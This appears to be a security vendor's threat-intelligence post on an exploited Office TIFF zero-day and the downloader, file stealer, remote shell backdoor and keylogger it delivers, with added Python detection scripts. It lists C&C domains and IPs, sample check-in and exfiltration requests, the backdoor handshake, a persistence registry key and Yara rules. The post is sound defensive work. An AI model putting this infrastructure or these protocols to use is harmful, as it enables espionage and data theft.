Earlier today Microsoft released a security advisory alerting about a new Microsoft Office vulnerability being exploited in the wild. The vulnerability affects Office 2003/2007 and Office 2010 only running on Windows XP/2003.
The vulnerability is related to the parsing of TIFF images, and Microsoft released a FixIt that basically blocks the rendering of TIFF images on the system.
The exploit we have analyzed uses ROP gadgets and ActiveX controls to heap spray memory (instead of Flash).
If the exploit is successful it uses URLDownloadToFileA to download and execute a payload from a remote HTTP server.
The downloaded payload is a RAR file containing both a malicious payload and a lure Office document that is shown to the victim.
We have found different payloads talking to the same C&C server that use different lure documents. Some of the lure documents are related to the Pakistani intelligence service (Inter-Services Intelligence or ISI) and the Pakistani military.
This payload communicates with the C&C server using the HTTP protocol:
GET /logitech/rt.php?cn=XXXXX@Administrator&str=&file=no HTTP/1.1
User-Agent: WinInetGet/0.1
When we saw this traffic we realized it was familiar. In fact the same protocol was used by one of the Operation Hangover payloads. We can confirm that the downloader is based on the Deksila downloader not only because it generates similar HTTP traffic but also because of the way it retrieves information from the system, and even the raw strings present in both payloads.
The presence of the following files can be used to find systems infected by different versions of the downloader ([USERNAME] stands for the victim's profile folder):
- C:\Documents and Settings\[USERNAME]\Temp\iconfall.log
- C:\Documents and Settings\[USERNAME]\HddLink.lnk
- C:\Documents and Settings\[USERNAME]\Updates.exe
- C:\Documents and Settings\[USERNAME]\wincert.exe
- C:\Documents and Settings\[USERNAME]\kayani.doc
- C:\Documents and Settings\[USERNAME]\Shanti.doc
- C:\Documents and Settings\[USERNAME]\Locations.doc
- C:\Documents and Settings\[USERNAME]\ISI.doc
- C:\Documents and Settings\[USERNAME]\GoodLuck.doc
- C:\cdata.txt
Based on the victim information we could retrieve from the C&C server, we can confirm that most of the IP addresses communicating with the C&C server are located in Pakistan.
When the infected system checks in to the C&C server a file is created with the following content:
User : [USERNAME]
IP : [IP_ADDRESS]
AV : [NAME_OF_ANTIVIRUS_SOLUTION]
The attackers are able to send other payloads to the infected systems (2nd stage) that are downloaded by the victims using HTTP requests. Based on the C&C information we collected this is the list of unique filenames that are being used to download 2nd stage payloads:
- alg.exe
- connhost.exe
- lgfxsrc.exe
- lgfxsrv.exe
- lgfxsrvc.exe
- msctcd.exe
- svchost.exe
- taskmgr.exe
- taskngr.exe
- waulct.exe
- wimhost.exe
- winlog.exe
- winlogon.exe
- winnit.exe
- winsoun.exe
- winword.exe
- wmpi.exe
- wsqmocn.exe
And the list of unique MD5s:
- 0d51296e5c74a22339ec8b7e318f274a
- 101852851d70dfc46c4d022ef077d586
- 2ed6a6c349cae3842023d83c6b1ed1c5
- 4e878b13459f652a99168aad2dce7c9a
- 654f558cf824e98dde09b197dbdfd407
- 6a57cda67939806359a03a86fd0eabc2
- 8378abb63da7e678c76c09f44b43d02a
- e75ad6c8484f524d93eaf249770be699
- fd51dc5f1683c666a4925af8f1361d5d
- fd75a23d8b3345e550c4a9bbc6dd2a0e
Of all the payloads we retrieved from the C&C, the following had already been uploaded to VirusTotal. Note the low antivirus detection rate:
- fd75a23d8b3345e550c4a9bbc6dd2a0e 1 / 47
- 6a57cda67939806359a03a86fd0eabc2 1 / 47
- 4e878b13459f652a99168aad2dce7c9a 1 / 47
- 2ed6a6c349cae3842023d83c6b1ed1c5 0 / 47
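As an added example (not code from the original post), here is a small Python host scanner that turns the file-name list and the MD5 list above into a triage check: it walks a directory tree, flags files whose name matches one of the downloader artefacts, and hashes executables against the second-stage MD5s. The second-stage file names themselves (svchost.exe, winlogon.exe, ...) are intentionally not used as name indicators because they collide with legitimate Windows binaries. The demo() function builds a constructed directory with made-up content; the hash it adds to the indicator set is the hash of that constructed content, not a real sample.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# Artefact file names from the downloader list, compared case-insensitively on the file name
# alone because the user-profile part of the path differs per victim.
IOC_FILENAMES = {
    "iconfall.log", "hddlink.lnk", "updates.exe", "wincert.exe", "kayani.doc",
    "shanti.doc", "locations.doc", "isi.doc", "goodluck.doc", "cdata.txt",
}
# MD5s of the second-stage payloads seen on the C&C.
IOC_MD5S = {
    "0d51296e5c74a22339ec8b7e318f274a", "101852851d70dfc46c4d022ef077d586",
    "2ed6a6c349cae3842023d83c6b1ed1c5", "4e878b13459f652a99168aad2dce7c9a",
    "654f558cf824e98dde09b197dbdfd407", "6a57cda67939806359a03a86fd0eabc2",
    "8378abb63da7e678c76c09f44b43d02a", "e75ad6c8484f524d93eaf249770be699",
    "fd51dc5f1683c666a4925af8f1361d5d", "fd75a23d8b3345e550c4a9bbc6dd2a0e",
}


def md5_of_file(path, chunk_size=1 << 20):
    """MD5 of a file, read in chunks so large binaries are not loaded into memory at once."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root, names=IOC_FILENAMES, md5s=IOC_MD5S, hash_suffixes=(".exe",)):
    """Walk root and return sorted [(path, reason)] for files whose name or MD5 is an indicator."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if name.lower() in names:
                hits.append((str(path), "filename indicator"))
            if path.suffix.lower() in hash_suffixes:
                try:
                    digest = md5_of_file(path)
                except OSError:  # locked or unreadable file: skip it rather than abort the scan
                    continue
                if digest in md5s:
                    hits.append((str(path), "md5 indicator " + digest))
    return sorted(hits)


def demo():
    """Scan a constructed directory tree; returns {file name: reason} for every hit."""
    payload = b"constructed stand-in for a second-stage binary"   # made-up content, not a sample
    fake_md5 = hashlib.md5(payload).hexdigest()
    with tempfile.TemporaryDirectory() as tmp:
        profile = Path(tmp) / "Documents and Settings" / "victim"
        profile.mkdir(parents=True)
        (profile / "Kayani.doc").write_bytes(b"lure document")   # name hit (case differs)
        (profile / "notes.txt").write_bytes(b"benign")           # no hit
        (profile / "svchost.exe").write_bytes(payload)           # hash hit; name alone is not used
        hits = scan_tree(tmp, md5s=IOC_MD5S | {fake_md5})
    return {Path(p).name: reason for p, reason in hits}


if __name__ == "__main__":
    for name, reason in demo().items():
        print(name, "->", reason)
```

On a real system you would point scan_tree at the root of each user profile (and C:\ for cdata.txt); hashing is limited to .exe by default to keep the scan fast, so widen hash_suffixes if the second stage is renamed.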
The following is a description of the different payloads we found on the C&C, with the aim of helping you build IOCs (Indicators of Compromise) and detect infected systems.
Main Downloader
- Network traffic
Performs HTTP GET requests; some examples are:
/logitech/rt.php?cn=xx@[USERNAME]&str=&file=no
/green/srt.php?cn=xx@[USERNAME]&str=&file=no
/funbox/rt.php?cn=[MACHINE_NAME]@[USERNAME] &str=&file=no
/joy/rt.php?cn=[MACHINE_NAME]@[USERNAME] &str=&file=no
You can look for the pattern “&str=&file=no” in your proxy logs to find infected systems.
- Yara rule:
rule Hangover2_Downloader
{
    strings:
        $a = "WinInetGet/0.1" wide ascii
        $b = "Excep while up" wide ascii
        $c = "&file=" wide ascii
        $d = "&str=" wide ascii
        $e = "?cn=" wide ascii
    condition:
        all of them
}
File stealer
It looks for the following file types on the infected system and exfiltrates them to the C&C server:
- xls,xlsx
- doc,docx
- ppt,pptx
- txt
- Network traffic
Performs POST requests; some examples are:
POST /crks.php HTTP/1.1
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
User-Agent: MyWebClient
Host: xxx
Connection: Keep-Alive

POST /drkl.php HTTP/1.1
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
User-Agent: MyWebClient
Host: xxx
Connection: Keep-Alive

POST /max.php HTTP/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
User-Agent: MyWebClient
Host: xxx
Connection: Keep-Alive
You can look for HTTP connections with the User-Agent MyWebClient.
- Yara rule
rule Hangover2_stealer
{
    strings:
        $a = "MyWebClient" wide ascii
        $b = "Location: {[0-9]+}" wide ascii
        $c = "[%s]:[C-%s]:[A-%s]:[W-%s]:[S-%d]" wide ascii
    condition:
        all of them
}
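The two proxy-log checks suggested above (the downloader's "?cn=...&str=&file=no" check-in URL and WinInetGet/0.1 User-Agent, and the stealer's MyWebClient User-Agent) can be run over exported proxy logs with a few lines of Python. This is an added example, not code from the original post; the log line layout (timestamp, client IP, method, URL, status, quoted User-Agent) is an assumption standing in for whatever your proxy writes, and the sample lines are constructed. The URL check parses the query string instead of grepping for the substring, so a legitimate URL that merely contains "file=no" inside another parameter does not fire.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed log layout: ts client method url status "user-agent"; adapt LINE_RE to your proxy.
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+) "(?P<ua>[^"]*)"$'
)

DOWNLOADER_UA = "WinInetGet/0.1"
STEALER_UA = "MyWebClient"

# Constructed sample log: two downloader check-ins, one stealer upload, two benign requests.
SAMPLE_PROXY_LOG = """\
1383600000.123 10.0.0.15 GET http://krickmart.com/logitech/rt.php?cn=WKS01@Administrator&str=&file=no 200 "WinInetGet/0.1"
1383600001.456 10.0.0.16 GET http://www.example.com/index.html 200 "Mozilla/5.0"
1383600002.789 10.0.0.17 POST http://maptonote.com/crks.php 200 "MyWebClient"
1383600003.111 10.0.0.18 GET http://lampur.com/joy/rt.php?cn=LAPTOP7@jsmith&str=&file=no 200 "WinInetGet/0.1"
1383600004.222 10.0.0.19 GET http://www.example.com/search?q=file%3Dno 200 "Mozilla/5.0"
"""


def classify_request(url, user_agent):
    """Return the list of indicators this request matches, or [] if none."""
    reasons = []
    # keep_blank_values=True is required: the "str=" parameter is empty in the check-in URL.
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    checkin_shape = (
        query.get("str") == [""]
        and query.get("file") == ["no"]
        and "@" in "".join(query.get("cn", []))   # cn=<machine>@<user>
    )
    if checkin_shape:
        reasons.append("downloader check-in URL pattern")
    if user_agent == DOWNLOADER_UA:
        reasons.append("downloader User-Agent")
    if user_agent == STEALER_UA:
        reasons.append("stealer User-Agent")
    return reasons


def scan_proxy_log(text):
    """Return [(client, url, reasons)] for every parsable line that matches an indicator."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:          # unparsable line: skip, do not abort the whole scan
            continue
        reasons = classify_request(m["url"], m["ua"])
        if reasons:
            hits.append((m["client"], m["url"], reasons))
    return hits


if __name__ == "__main__":
    for client, url, reasons in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(client, url, ", ".join(reasons))
```

The User-Agent checks are exact matches on purpose: both strings are short enough that a substring match would pick up unrelated clients, and the post gives them verbatim.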
Remote shell backdoor
- Network traffic
This payload is a remote shell backdoor that uses a binary protocol on port 5858. Example traffic:
T VICTIM:1050 -> C&C:5858 [A]
FHEPF
#
T VICTIM:5858 -> C&C:1050 [AP]
Pass
#
T VICTIM:1050 -> C&C:5858 [AP]
Authjanettedoe @ [MACHINE_NAME]#/[OPERATING_SYSTEM]#/[IP_ADDRESS]#/
- Yara rule
Yara rule
rule Hangover2_backdoor_shell
{
    strings:
        $a = "Shell started at: " wide ascii
        $b = "Shell closed at: " wide ascii
        $c = "Shell is already closed!" wide ascii
        $d = "Shell is not Running!" wide ascii
    condition:
        all of them
}
You can also look for the creation of the following registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WinLstart
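As an added example (not from the original post), the handshake shown above can be recognized in reassembled TCP flows, for instance when triaging a packet capture for port 5858 traffic: the victim sends "FHEPF", the C&C answers "Pass", and the victim then sends an "Auth" message carrying its user name, machine name, operating system and IP address separated by "#/". The Python below classifies the first three payloads of a flow and extracts those fields. The direction labels ("c2s" for victim to C&C, "s2c" for the reply) and the sample values (WKS-01, Windows XP, 10.0.0.15) are assumptions; the message constants come from the capture above.

```python
# Handshake messages from the capture above.
HELLO = b"FHEPF"        # victim -> C&C, first payload
HELLO_REPLY = b"Pass"   # C&C -> victim
AUTH_PREFIX = b"Auth"   # victim -> C&C, followed by "<user> @ <machine>#/<os>#/<ip>#/"


def parse_auth(payload):
    """Split an Auth message into its fields; returns None if the layout does not match."""
    if not payload.startswith(AUTH_PREFIX):
        return None
    body = payload[len(AUTH_PREFIX):].decode("latin-1")   # never raises on odd bytes
    fields = body.split("#/")
    # Expected: "<user> @ <machine>", "<os>", "<ip>", and an empty trailer after the final "#/"
    if len(fields) != 4 or fields[3] != "":
        return None
    user, sep, machine = fields[0].partition(" @ ")
    if not sep:
        return None
    return {"user": user, "machine": machine, "os": fields[1], "ip": fields[2]}


def classify_flow(messages):
    """messages: first payloads of one TCP flow as (direction, bytes), direction 'c2s' or 's2c'.
    Returns the parsed Auth fields when the flow follows the FHEPF / Pass / Auth handshake,
    otherwise None."""
    if len(messages) < 3:
        return None
    (d0, p0), (d1, p1), (d2, p2) = messages[:3]
    if (d0, p0) != ("c2s", HELLO) or (d1, p1) != ("s2c", HELLO_REPLY) or d2 != "c2s":
        return None
    return parse_auth(p2)


# Constructed flow mirroring the capture above; machine, OS and IP values are made up.
SAMPLE_FLOW = [
    ("c2s", b"FHEPF"),
    ("s2c", b"Pass"),
    ("c2s", b"Authjanettedoe @ WKS-01#/Windows XP#/10.0.0.15#/"),
]

# Constructed benign flow on the same port, to show the classifier stays quiet.
SAMPLE_HTTP_FLOW = [
    ("c2s", b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"),
    ("s2c", b"HTTP/1.1 200 OK\r\n\r\n"),
    ("c2s", b""),
]

if __name__ == "__main__":
    print(classify_flow(SAMPLE_FLOW))
    print(classify_flow(SAMPLE_HTTP_FLOW))
```

Matching on the full three-message exchange rather than on "FHEPF" alone keeps false positives down, and the parsed fields give you the victim identity for your incident records without touching the host.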
Keylogger
This payload installs global keyboard hooks to capture keystrokes.
- Yara rule
rule Hangover2_Keylogger
{
    strings:
        $a = "iconfall" wide ascii
        $b = "/c ipconfig /all > \"" wide ascii
        $c = "Global\\{CHKAJESKRB9-35NA7-94Y436G37KGT}" wide ascii
    condition:
        all of them
}
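The four Yara rules above all use text strings declared "wide ascii" with "all of them" as the condition. As an added example (not part of the original post and not a replacement for Yara), the Python below emulates exactly that: each string is searched both as plain ASCII and as UTF-16LE (what "wide" means, and how Windows binaries usually store their strings), and a rule fires only when every string is present in at least one form. It also shows the escaping the keylogger rule needs, since both Yara and Python write a literal quote as \" and a literal backslash as \\. The sample blob is constructed; it is not malware content.

```python
# Text strings from the four Yara rules in this post, keyed by rule name.
RULES = {
    "Hangover2_Downloader": ["WinInetGet/0.1", "Excep while up", "&file=", "&str=", "?cn="],
    "Hangover2_stealer": ["MyWebClient", "Location: {[0-9]+}", "[%s]:[C-%s]:[A-%s]:[W-%s]:[S-%d]"],
    "Hangover2_backdoor_shell": ["Shell started at: ", "Shell closed at: ",
                                 "Shell is already closed!", "Shell is not Running!"],
    # \" and \\ escape the same way in Yara and in Python source.
    "Hangover2_Keylogger": ["iconfall", '/c ipconfig /all > "',
                            "Global\\{CHKAJESKRB9-35NA7-94Y436G37KGT}"],
}


def byte_forms(text):
    """The byte patterns Yara searches for a text string declared 'wide ascii':
    the plain ASCII form and the UTF-16LE ('wide') form."""
    return text.encode("ascii"), text.encode("utf-16-le")


def match_rule(strings, data):
    """Emulate 'condition: all of them': every string must occur in at least one encoding."""
    return all(any(form in data for form in byte_forms(s)) for s in strings)


def scan(data):
    """Return the names of the rules whose strings all occur in data."""
    return [name for name, strings in RULES.items() if match_rule(strings, data)]


# Constructed sample blob mixing ASCII and UTF-16LE strings, the way a PE's data sections do.
SAMPLE_KEYLOGGER = (
    b"\x00" * 16
    + b"iconfall\x00"
    + '/c ipconfig /all > "'.encode("utf-16-le") + b"\x00\x00"
    + b"Global\\{CHKAJESKRB9-35NA7-94Y436G37KGT}\x00"
    + b"MyWebClient\x00"   # one stealer string on its own must not fire the stealer rule
)

if __name__ == "__main__":
    print(scan(SAMPLE_KEYLOGGER))
```

Running the real rules with the yara tool gives the same verdict; the value of the emulation is seeing why a rule that is missing one encoding keyword silently stops matching Unicode builds of the same family.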
Schneebly (Screenshot payload)
This payload takes screenshots and uploads them to the C&C server.
- Network traffic
Example traffic:
The Yara rules can be downloaded from our GitHub repository.
Finally, this is the list of IP addresses and domain names that are being used by the attackers to host C&C servers and malicious payloads:
- krickmart.com
- 37.0.125.77
- 37.0.124.106
- maptonote.com
- myflatnet.com
- lampur.com
- appworldstores.com
- similerwork.net
- intertechsupport.net
- twikstore.com
We will continue publishing more information about the Microsoft Office 0day and more IOCs as soon as we discover new data.